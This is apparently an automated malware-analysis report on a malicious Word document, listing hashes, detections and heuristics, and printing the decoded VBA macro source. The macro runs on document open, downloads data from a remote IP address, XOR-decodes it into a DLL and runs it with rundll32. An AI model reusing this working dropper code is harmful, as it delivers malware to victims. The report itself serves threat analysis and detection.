Office (OLE) malware analysis — malicious · 3fbb90ce01a54895

MALICIOUS

Office (OLE)

112.0 KB Created: 2019-08-08 20:00:00 Authoring application: Microsoft Office Word First seen: 2021-04-10

MD5: ecbde83646169cff0950fd843442d4a9 SHA-1: 77971716f6b659500259fca15518dbe72f83e827 SHA-256: 3fbb90ce01a548955b3e2fbda4de3b5a83f6ad1db846d19256df994777f8c524

378 Risk Score

Heuristics 11

ClamAV: Doc.Dropper.Agent-7109703-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-7109703-0
VBA macros detected medium 6 related findings OLE_VBA_MACROS

Document contains VBA macro code
WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage
Matched line in script
```
CreateObject("WScript.Shell").Exec ("rundll32 " + fileextensionsline & ",Get2")
```
LOLBin reference in VBA critical OLE_VBA_LOLBIN

LOLBin reference in VBA
Matched line in script
```
CreateObject("WScript.Shell").Exec ("rundll32 " + fileextensionsline & ",Get2")
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set recovered_tb = CreateObject("InternetExplorer.Application")
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
```
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Matched line in script
```
ChDir (Environ("TEMP"))
```
Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host
LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND

Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://27.102.102.235/235.txt In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3204 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3204 bytes
SHA-256: `5259d157d4dbcbebe5073afb1fc87e18e0b0c444c80c026bbfab526fc2e33ef5`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Public Sub ReadFromExcel() Dim cachingcore() As String, fldarr() As String, labelNamesubname As Long, removeID_tb As Integer, mode_val As String Dim emailsid As String On Error Resume Next Dim sortspecial As Integer, lstwords As Integer, notestep2 As Integer Dim completed_bID As String sortspecial = 1 notestep2 = 2 lstwords = 0 emailsid = "output.pdf" Dim recovered_tb As Object Set recovered_tb = CreateObject("InternetExplorer.Application") With recovered_tb .navigate ("http://27.102.102.235/235.txt") Do Until .readyState = 4 DoEvents Loop completed_bID = .Document.body.innerText ChDir (Environ("TEMP")) Call variable_caption(completed_bID, emailsid, lstwords, notestep2) Dim fileextensionsline As String fileextensionsline = "Retract.dll" Call variable_caption(completed_bID, fileextensionsline, lstwords, sortspecial) Module1.Fido Done: Call variable_caption(completed_bID, fileextensionsline, lstwords, lstwords) Module1.Fido CreateObject("WScript.Shell").Exec ("rundll32 " + fileextensionsline & ",Get2") .Quit End With End Sub Private Sub Document_Close() End Sub Private Sub Document_New() End Sub Private Sub Document_Open() UserForm1.Show End Sub Attribute VB_Name = "UserForm1" Attribute VB_Base = "0{D9EA30D0-79EC-4F39-A676-D35438565693}{2C0D1A03-4B29-4197-849E-45DF52934DAA}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub UserForm_Activate() ThisDocument.ReadFromExcel End Sub Private Sub UserForm_Click() End Sub Attribute VB_Name = "Module1" Declare PtrSafe Function Fido Lib "Retract" Alias _ "Seduct" () As Integer Public Sub variable_caption(split_sEcho As String, languages_foo2 As String, nomnumber As Integer, nomnumber2 As Integer) Dim cachingcore() As String, fldarr() As String, labelNamesubname As Long, removeID_tb As Integer, mode_val As String Dim BIGGER_u30 As String Dim iSortingCols_response() As Byte Dim jabberlogout As Integer Dim adress_subtitle As Byte iSortingCols_response = StrConv(split_sEcho, vbFromUnicode) BIGGER_u30 = StrConv(iSortingCols_response, vbUnicode) cachingcore = Split(BIGGER_u30, vbCrLf) If UBound(cachingcore) = 0 Then cachingcore = Split(BIGGER_u30, vbLf) If UBound(cachingcore) = 0 Then cachingcore = Split(BIGGER_u30, vbCr) End If End If Open languages_foo2 For Binary Lock Read Write As #2 For labelNamesubname = 0 To (UBound(cachingcore)) fldarr = Split(cachingcore(labelNamesubname), ",") mode_val = fldarr(nomnumber) If Len(mode_val) > 0 Then adress_subtitle = Val(mode_val) adress_subtitle = adress_subtitle Xor (180 + nomnumber2) Put #2, , CByte(adress_subtitle) End If Next Close #2 End Sub

SHA-256: 5259d157d4dbcbebe5073afb1fc87e18e0b0c444c80c026bbfab526fc2e33ef5

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

 

Public Sub ReadFromExcel()
Dim cachingcore() As String, fldarr() As String, labelNamesubname As Long, removeID_tb As Integer, mode_val As String
Dim emailsid As String

On Error Resume Next


Dim sortspecial As Integer, lstwords As Integer, notestep2 As Integer
Dim completed_bID As String


sortspecial = 1
notestep2 = 2
lstwords = 0
emailsid = "output.pdf"
Dim recovered_tb As Object

Set recovered_tb = CreateObject("InternetExplorer.Application")
With recovered_tb

.navigate ("http://27.102.102.235/235.txt")
Do Until .readyState = 4
DoEvents
Loop
completed_bID = .Document.body.innerText
ChDir (Environ("TEMP"))
Call variable_caption(completed_bID, emailsid, lstwords, notestep2)

Dim fileextensionsline As String

fileextensionsline = "Retract.dll"

Call variable_caption(completed_bID, fileextensionsline, lstwords, sortspecial)




Module1.Fido

Done:
Call variable_caption(completed_bID, fileextensionsline, lstwords, lstwords)

Module1.Fido

CreateObject("WScript.Shell").Exec ("rundll32 " + fileextensionsline & ",Get2")

.Quit
End With

End Sub
Private Sub Document_Close()


End Sub

Private Sub Document_New()

End Sub

Private Sub Document_Open()
UserForm1.Show
End Sub




Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{D9EA30D0-79EC-4F39-A676-D35438565693}{2C0D1A03-4B29-4197-849E-45DF52934DAA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
 
Private Sub UserForm_Activate()
ThisDocument.ReadFromExcel

End Sub

Private Sub UserForm_Click()

End Sub

Attribute VB_Name = "Module1"
Declare PtrSafe Function Fido Lib "Retract" Alias _
"Seduct" () As Integer


 Public Sub variable_caption(split_sEcho As String, languages_foo2 As String, nomnumber As Integer, nomnumber2 As Integer)
Dim cachingcore() As String, fldarr() As String, labelNamesubname As Long, removeID_tb As Integer, mode_val As String
Dim BIGGER_u30 As String
Dim iSortingCols_response() As Byte
Dim jabberlogout As Integer
Dim adress_subtitle As Byte
iSortingCols_response = StrConv(split_sEcho, vbFromUnicode)
BIGGER_u30 = StrConv(iSortingCols_response, vbUnicode)
cachingcore = Split(BIGGER_u30, vbCrLf)
If UBound(cachingcore) = 0 Then
    cachingcore = Split(BIGGER_u30, vbLf)
    If UBound(cachingcore) = 0 Then
        cachingcore = Split(BIGGER_u30, vbCr)
    End If
End If
Open languages_foo2 For Binary Lock Read Write As #2

For labelNamesubname = 0 To (UBound(cachingcore))

fldarr = Split(cachingcore(labelNamesubname), ",")
mode_val = fldarr(nomnumber)
If Len(mode_val) > 0 Then
adress_subtitle = Val(mode_val)
adress_subtitle = adress_subtitle Xor (180 + nomnumber2)
Put #2, , CByte(adress_subtitle)
End If


Next
Close #2
 End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.